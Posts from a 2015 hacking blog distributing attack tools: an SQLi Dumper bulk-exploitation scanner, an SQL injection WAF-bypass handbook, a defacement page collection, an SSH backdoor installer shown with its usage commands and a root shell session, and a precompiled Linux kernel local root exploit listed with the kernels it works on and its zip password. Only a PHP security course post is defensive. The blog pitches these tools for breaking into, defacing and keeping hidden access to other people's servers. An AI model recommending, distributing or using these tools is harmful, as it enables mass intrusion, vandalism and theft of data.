Friday, May 22, 2015

PHP Security Training Video


Topics of the Course

What is the threat?
  • How can you analyze the threat?
  • What types of threats are out there?
  • How bad is it?
  • What threats are specific to PHP?
  • What are some resources to find out more?


What are the consequences when a website is not protected against attack?
  • Financial loss
  • Loss of service
  • Identity theft
  • Website infection


What are the most common forms of attack?

  • Cross-site scripting (XSS)
  • Remote code injection
  • Session hijacking, fixation, and request forgery
  • SQL injection

What are the most common vulnerabilities attackers can exploit?

  • Unplanned information disclosure
  • Predictable resource location
  • Insufficient authorization
  • Improper access controls
  • PHP misconfiguration
  • Mishandling file uploads

Download: MediaFire

Wednesday, May 20, 2015

SQLi Dumper - Advanced SQL Injection\Scanner Tool v7.0 Private Version

 
Designed to automatically find and exploit web security vulnerabilities in bulk, worldwide.
It is robust, runs in background threads and is very fast.
Uses an advanced search engine with 10 different online search services.

Last release: 06/23/2014 v.7.0

SQLi Dumper Features:

-Supports 20 methods of SQL injection;
-Supports multiple online search engines (to find the targets);
-Automated search for data in a bulk URL list;
-Automated analyzer and dumper with custom injection points (URL, POST, Cookies, UserLogin or UserPassword);
-Dumper supports dumping data with multi-threading (databases/tables/columns/fetching data);
-Exploiter, Analyzer and Dumper support up to 50 separate threads;
-Advanced WAF bypass methods;
-Advanced custom query box;
-Dumper can dump large amounts of data, with great control of the delay between requests;
-Easy switching between vulnerabilities (internal database);
-Supports proxy lists;
-GeoIP database;
-Advanced Trash System works with millions of URLs;
-Admin login finder;
-Standalone .exe (no install).
 
 
Download: Sqli Dumper
 

Wednesday, May 6, 2015

SQL Injection Bypassing handbook


Content writers :-

Chapter I


  • SQL Injection: What is it?
  • SQL Injection: An In-depth Explanation
  • Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?
  • Is my database at risk to SQL Injection?
  • What is the impact of SQL Injection?
  • Example of an SQL Injection Attack

Web Application Firewalls


  • Detecting A WAF
  • Prompt Message
  • Dotdefender
  • Observing HTTP Response

Chapter II

Advanced evasion techniques for defeating SQL injection Input validation mechanisms
Web applications are becoming more and more technically complex. Web applications, their

  • Whitespace
  • Null Bytes
  • SQL Comments
  • URL Encoding
  • Changing Cases
  • Encode to Hex Forbidden
  • Replacing keywords technique
  • WAF Bypassing – using characters
  • HTTP Parameter Pollution (HPP)
  • CRLF WAF Bypass technique
  • Buffer Overflow bypassing

Chapter III

Let's go through the matter in order, from the beginning:
  • See if the site is vulnerable or not
  • Get Column Number
  • Bypassing union select
  • Get Version
  • Group & Concat
  • Bypass with Information_schema.tables
  • Requested Bypassing

Chapter IV

Other issues related to the subject
  • Null Parameter
  • Find Vulnerable Columns
  • Count(*)
  • unhex()
  • Get database
Download : MediaFire

source: HF

Sunday, May 3, 2015

Best Deface pages Collection

Don't have time to design a deface page?
Don't worry, here you can download the best deface pages.
Just replace the name and message with your own name and message!
Click on Download and copy the code, then use it. For a demo you can paste the code on Pastehtml.com.

How to edit and save it?
All HTML codes are shared on Pastebin; copy the code and paste it into Notepad,
then edit it and save it as index.html or anyname.html.


1- Tiger M@te's Deface Page
This deface page was uploaded on Google Bangladesh's domain Google.com.bd
 : Download


2- Happy Birthday Deface Page
for making someone's birthday special =)
 : Download

3- Deface Page For Long Messages + Video 
Designed By Ffessxt Prince indishell
: Download 


4- #opFreedom Palestine
Deface page with a Free Palestine message, designed by The Hackers army
 : Download


5- Lovely Deface Page for Your Girlfriend or Loved One
This deface page was designed by me =)
 : Download


6-Deface Page with dancing firefox script
 : Download


7-Multi colour deface page
 : Download  


8- Simple Black Deface Page 
Designed by Hax root
 : Download


9-Matrix Style Deface Page
Designed by ShOrTy420
 : Download


10-Pro Style Deface Page 
 : Download


9- Awesome #opFreedom Palestine Page with New Functions
This page was designed by Syakila Daniel
 : Download


10- Awesome Matrix Style Deface Page
Designed by coded32 
: Download


11- Romantic deface Page with Roses
designed by Deepak  Carpenter
: Download


12- Deface Page with Jquery 
Designed by Privatex
 : Download


13- #opmegaupload Deface Page
 : Download

14- A Programmer's Deface Page with Love Letter
Designed by Me .. =)
 : Download

Thursday, April 2, 2015

sshDoor (good ssh backdoor)



Usage:
./install password port
./install jancok 33

 
open putty
ssh port : 33 login : root password : jancok

[root@serv ~]# uname -a;id
Linux serv.test.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 20010 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv ~]# 

Download:  Here

Local Root Exploit For Linux Kernel 2.6.32 (precompile)



Note: 
It's a pre-compiled exploit and has been verified on the listed servers. It might work on other 2.6.32-X kernels too. So, test it and update us in the comments. Thanks.
Following is the list of vulnerable kernels which can be rooted with our exploit.

Vulnerable Kernels:

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64
Linux localhost.domain 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64
Linux localhost.domain 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64
Linux localhost.domain 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64
Linux localhost.domain 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64
Linux localhost.domain 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64
Linux localhost.domain 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64
Linux localhost.domain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
Linux localhost.domain 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64
Linux localhost.domain 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64
Linux localhost.domain 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64
Linux localhost.domain 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64
Linux localhost.domain 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64
Linux localhost.domain 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64
Linux localhost.domain 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64
Linux localhost.domain 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64
Linux localhost.domain 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64
Linux localhost.domain 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64
Linux localhost.domain 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64
Linux localhost.domain 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64
Linux localhost.domain 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64
Linux localhost.domain 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64
Linux localhost.domain 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64
Linux localhost.domain 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64
Linux localhost.domain 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
Linux localhost.domain 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64
Linux localhost.domain 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64
Linux localhost.domain 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64
Linux localhost.domain 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux 
 Download here
Zip Password: *pakmadhunters* 
credit to  owner :)